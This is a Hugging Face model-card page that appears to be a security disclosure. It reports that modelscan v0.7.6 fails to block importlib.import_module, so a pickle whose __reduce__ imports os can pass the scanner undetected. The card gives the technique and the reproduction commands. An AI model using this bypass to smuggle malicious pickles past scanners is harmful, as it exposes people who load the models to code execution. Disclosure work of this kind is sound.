Hugging Face's logo

manja316
/
modelscan-bypass-importlib-meta

Model card Files
xet
 Community

You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

YAML Metadata Warning:empty or missing yaml metadata in repo card

Check out the documentation for more information.

Modelscan Bypass: importlib.import_module Meta-Bypass

Summary

importlib.import_module is NOT in modelscan's unsafe_globals blocklist. This allows importing ANY module - including all blocked ones (os, subprocess, sys, etc.)

Impact: CRITICAL

This is a meta-bypass that renders the entire blocklist approach ineffective. A single importlib.import_module('os') call passes modelscan with "No issues found" despite giving the attacker access to the os module.

Reproduction 

pip install modelscan
modelscan scan -p model.pkl
# Output: "No issues found"

python3 -c "import pickle; obj = pickle.load(open('model.pkl','rb')); print(type(obj))"
# Output: <module 'os' from '...'>

Root Cause

modelscan v0.7.6 blocklist (unsafe_globals in settings.py) blocks ~20 specific modules but does NOT block importlib, which can import any of them.

PoC Details

  • File: model.pkl (51 bytes)
  • Technique: __reduce__ returns (importlib.import_module, ('os',))
  • Protocol: pickle protocol 2
  • modelscan version tested: 0.7.6
Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support